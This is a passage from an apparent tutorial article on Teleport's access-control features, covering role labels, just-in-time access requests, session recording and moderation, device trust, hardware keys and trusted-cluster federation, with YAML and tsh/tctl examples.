&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Server labels&lt;/span&gt;
&lt;span class="na"&gt;ssh_service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
    &lt;span class="na"&gt;team&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;
    &lt;span class="na"&gt;region&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;us-west-2&lt;/span&gt;

&lt;span class="c1"&gt;# Role can access any server matching these labels&lt;/span&gt;
&lt;span class="na"&gt;allow&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;node_labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;env'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;production'&lt;/span&gt;
    &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;team'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;backend'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Multi-Role Assignment:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Users can have multiple roles, with permissions being additive:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# User has both developer and on-call roles&lt;/span&gt;
&lt;span class="na"&gt;users&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;alice&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;roles&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;developer'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;on-call-responder'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="c1"&gt;# Combined permissions from both roles apply&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
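
&lt;p&gt;The same assignment can be made with &lt;code&gt;tctl&lt;/code&gt;. A minimal sketch (the username is illustrative):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create a user with both roles; the effective permissions are the union&lt;/span&gt;
tctl users add alice --roles=developer,on-call-responder
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;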




&lt;h3&gt;
  
  
  Access Requests: Just-In-Time Privilege Escalation
&lt;/h3&gt;

&lt;p&gt;Access Requests enable users to request temporarily elevated privileges. This implements the principle of least privilege by default, with the ability to escalate when needed.&lt;/p&gt;
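
&lt;p&gt;From the user's side, the workflow is driven by &lt;code&gt;tsh&lt;/code&gt;. A minimal sketch, assuming a recent Teleport version (role and reason values are illustrative):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Request the elevated role with a justification&lt;/span&gt;
tsh request create --roles=production-dba --reason="investigating a production incident"

&lt;span class="c"&gt;# Check the status of pending requests&lt;/span&gt;
tsh request ls

&lt;span class="c"&gt;# Once approved, re-login to assume the elevated role&lt;/span&gt;
tsh login --request-id=&amp;lt;request-id&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;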

&lt;p&gt;&lt;strong&gt;Access Request Workflow:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9dzag0pbzzdw5hv7g3cz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9dzag0pbzzdw5hv7g3cz.png" alt="image" width="800" height="366"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Approval Workflows:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Role that can request production access&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;developer&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;allow&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;request&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;roles&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;production-dba'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="na"&gt;thresholds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;approve&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;2&lt;/span&gt;  &lt;span class="c1"&gt;# Requires 2 approvals&lt;/span&gt;
        &lt;span class="na"&gt;deny&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;
      &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;wtf&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Reason&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;for&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;access"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Integration with External Systems:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Slack&lt;/strong&gt;: Approvals via Slack buttons&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PagerDuty&lt;/strong&gt;: Auto-approve during on-call&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Jira/ServiceNow&lt;/strong&gt;: Link to change tickets&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom Webhooks&lt;/strong&gt;: Integrate with any system&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;
  
  
  Session Recording and Playback
&lt;/h3&gt;

&lt;p&gt;Teleport records all interactive sessions, creating a complete audit trail of infrastructure access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What Gets Recorded:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;SSH Sessions&lt;/strong&gt;: Complete terminal input/output&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kubernetes Sessions&lt;/strong&gt;: kubectl commands and API requests&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Database Sessions&lt;/strong&gt;: Connection events and metadata (engine-specific query visibility)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Desktop Sessions&lt;/strong&gt;: Full RDP session video&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Application Access&lt;/strong&gt;: HTTP requests and responses&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Session Recording Modes:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Node-level recording (recorded by agent)&lt;/span&gt;
&lt;span class="na"&gt;record_session&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;desktop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;default&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;node&lt;/span&gt;

&lt;span class="c1"&gt;# Proxy-level recording (recorded by proxy)&lt;/span&gt;
&lt;span class="na"&gt;record_session&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;desktop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;default&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;proxy&lt;/span&gt;

&lt;span class="c1"&gt;# No recording&lt;/span&gt;
&lt;span class="na"&gt;record_session&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;desktop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
  &lt;span class="na"&gt;default&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;off&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Recording mode trade-offs:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Mode&lt;/th&gt;
&lt;th&gt;Scalability&lt;/th&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;node&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Better — load distributed across agents&lt;/td&gt;
&lt;td&gt;Lower — agent must be healthy&lt;/td&gt;
&lt;td&gt;Preferred for large fleets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;proxy&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Heavier — Proxy bears recording CPU/bandwidth&lt;/td&gt;
&lt;td&gt;Stronger — recording always captured centrally&lt;/td&gt;
&lt;td&gt;Preferred when agent tampering is a concern&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;off&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Best&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Development environments only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Playback Interface:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftopwwux7fe5wypcyr6gg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftopwwux7fe5wypcyr6gg.png" alt="image" width="800" height="441"&gt;&lt;/a&gt;&lt;/p&gt;
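
&lt;p&gt;Recordings can also be replayed from the terminal. A minimal sketch, assuming a recent &lt;code&gt;tsh&lt;/code&gt; (the session ID is a placeholder):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# List recorded sessions&lt;/span&gt;
tsh recordings ls

&lt;span class="c"&gt;# Replay a recorded session in the terminal&lt;/span&gt;
tsh play &amp;lt;session-id&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;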

&lt;p&gt;&lt;strong&gt;Compliance Benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PCI DSS&lt;/strong&gt;: Administrator actions on cardholder systems&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;HIPAA&lt;/strong&gt;: Access to systems with PHI&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SOC 2&lt;/strong&gt;: Evidence of access controls and monitoring&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FedRAMP&lt;/strong&gt;: Government compliance requirements&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;
  
  
  Session Moderation and Shared Access
&lt;/h3&gt;

&lt;p&gt;Teleport enables real-time session collaboration and oversight, which is critical for training, troubleshooting, and compliance.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Session Joining:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Multiple users can join an active session:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Start a session&lt;/span&gt;
tsh ssh node1

&lt;span class="c"&gt;# Another user joins the session (read-only or interactive)&lt;/span&gt;
tsh &lt;span class="nb"&gt;join &lt;/span&gt;alice@node1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Moderated Sessions:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Require approval before sensitive sessions begin:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production-admin&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;allow&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;require_session_join&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;auditor&lt;/span&gt;
      &lt;span class="na"&gt;kinds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;k8s'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;ssh'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="na"&gt;modes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;moderator'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="na"&gt;on_leave&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;terminate&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Session Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Terminate&lt;/strong&gt;: Kill an active session remotely&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitor&lt;/strong&gt;: Watch sessions in real-time without participating&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Force Termination&lt;/strong&gt;: Automatically end sessions when moderator leaves&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Use Cases:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Training&lt;/strong&gt;: Senior engineers guide juniors through production tasks&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance&lt;/strong&gt;: Security team oversight of privileged access&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Incident Response&lt;/strong&gt;: Multiple responders collaborate on a live issue&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vendor Access&lt;/strong&gt;: Monitor third-party contractor activities&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;
  
  
  Device Trust and Hardware Security
&lt;/h3&gt;

&lt;p&gt;Teleport supports enhanced security through device posture checking and hardware security keys.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Device Trust:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Verify the security posture of devices before granting access:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production-access&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;options&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;device_trust_mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;required&lt;/span&gt;
  &lt;span class="na"&gt;allow&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Only devices registered and verified can access&lt;/span&gt;
    &lt;span class="na"&gt;node_labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;env'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;production'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Device Registration:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Devices must be enrolled in Teleport&lt;/li&gt;
&lt;li&gt;Device identity verified via TPM or Secure Enclave&lt;/li&gt;
&lt;li&gt;Can integrate with device identity and posture signals depending on platform&lt;/li&gt;
&lt;li&gt;Certificate issued to device, not just user&lt;/li&gt;
&lt;/ul&gt;
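
&lt;p&gt;Enrollment itself is an explicit, two-step flow. A hedged sketch (Device Trust is an enterprise feature; exact commands and flags vary by version, and the token and serial values are placeholders):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Register the device and issue an enrollment token (admin)&lt;/span&gt;
tctl devices add --os=macos --asset-tag=&amp;lt;serial-number&amp;gt; --enroll

&lt;span class="c"&gt;# Enroll from the device itself (user)&lt;/span&gt;
tsh device enroll --token=&amp;lt;enrollment-token&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;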

&lt;p&gt;&lt;strong&gt;Hardware Security Keys (FIDO2/WebAuthn):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Require hardware security key for authentication&lt;/span&gt;
&lt;span class="na"&gt;authentication&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;local&lt;/span&gt;
  &lt;span class="na"&gt;second_factor&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;webauthn&lt;/span&gt;
  &lt;span class="na"&gt;webauthn&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;rp_id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;teleport.example.com&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Phishing Resistance&lt;/strong&gt;: FIDO2 keys can't be phished&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Device Binding&lt;/strong&gt;: Access tied to specific physical device&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero Trust&lt;/strong&gt;: Device posture continuously verified&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reduced Risk&lt;/strong&gt;: Even if password leaked, hardware key required&lt;/li&gt;
&lt;/ul&gt;
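
&lt;p&gt;With this configuration in place, users register keys through &lt;code&gt;tsh&lt;/code&gt;. A minimal sketch (the device name is a placeholder):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Register a hardware key as an MFA device&lt;/span&gt;
tsh mfa add

&lt;span class="c"&gt;# List registered MFA devices&lt;/span&gt;
tsh mfa ls

&lt;span class="c"&gt;# Remove a lost key&lt;/span&gt;
tsh mfa rm &amp;lt;device-name&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;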


&lt;h3&gt;
  
  
  Trusted Clusters: Multi-Org Federation
&lt;/h3&gt;

&lt;p&gt;Trusted Clusters enable organizations to federate multiple Teleport clusters while maintaining independent security boundaries.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Architecture:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd3jdc8y6pq3iwi6mqq20.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd3jdc8y6pq3iwi6mqq20.png" alt="image" width="800" height="661"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Use Cases:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multi-Region&lt;/strong&gt;: Separate clusters per region with central access&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Business Units&lt;/strong&gt;: Independent teams with shared identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Customer Environments&lt;/strong&gt;: MSPs managing multiple customer clusters&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Acquisitions&lt;/strong&gt;: Integrate acquired companies while maintaining isolation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Trust Configuration:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# On leaf cluster - establish trust with root&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;trusted_cluster&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;root-cluster&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;role_map&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;remote&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;developer"&lt;/span&gt;
    &lt;span class="na"&gt;local&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;leaf-developer"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
  &lt;span class="na"&gt;proxy_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;root.teleport.example.com:443&lt;/span&gt;
  &lt;span class="na"&gt;token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;trusted-cluster-join-token"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Security Considerations:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Trust is explicit and directional: root-cluster users gain access to the leaf, not the reverse&lt;/li&gt;
&lt;li&gt;Role mapping controls what root users can do in leaf&lt;/li&gt;
&lt;li&gt;Leaf cluster RBAC still enforced independently&lt;/li&gt;
&lt;li&gt;Audit logs maintained in each cluster&lt;/li&gt;
&lt;li&gt;Trust can be revoked at any time&lt;/li&gt;
&lt;/ul&gt;
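
&lt;p&gt;Once trust is established, root-cluster users reach leaf resources through their existing login. A minimal sketch (cluster and host names are illustrative):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Log in to the root cluster&lt;/span&gt;
tsh login --proxy=root.teleport.example.com

&lt;span class="c"&gt;# List reachable clusters, then resources in the leaf&lt;/span&gt;
tsh clusters
tsh ls --cluster=leaf-cluster

&lt;span class="c"&gt;# SSH into a node behind the leaf cluster&lt;/span&gt;
tsh ssh --cluster=leaf-cluster ubuntu@node1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;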


&lt;h3&gt;
  
  
  Teleport Connect: Desktop Experience
&lt;/h3&gt;

&lt;p&gt;Teleport Connect is a desktop application that provides a graphical interface for infrastructure access, making Teleport more accessible to users who prefer GUIs over command-line tools.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Features:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Visual Resource Browser&lt;/strong&gt;: Point-and-click access to servers, databases, and Kubernetes clusters&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Saved Connections&lt;/strong&gt;: Frequently accessed resources bookmarked for quick access&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integrated Terminal&lt;/strong&gt;: Built-in terminal for SSH sessions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Database Clients&lt;/strong&gt;: GUI for database queries and management&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cross-Platform&lt;/strong&gt;: Available for macOS, Windows, and Linux&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Lower Barrier to Entry&lt;/strong&gt;: Easier for users new to Teleport&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Productivity&lt;/strong&gt;: Quick access to common resources&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Consistency&lt;/strong&gt;: Same security model as tsh CLI&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integration&lt;/strong&gt;: Works alongside existing Teleport deployment&lt;/li&gt;
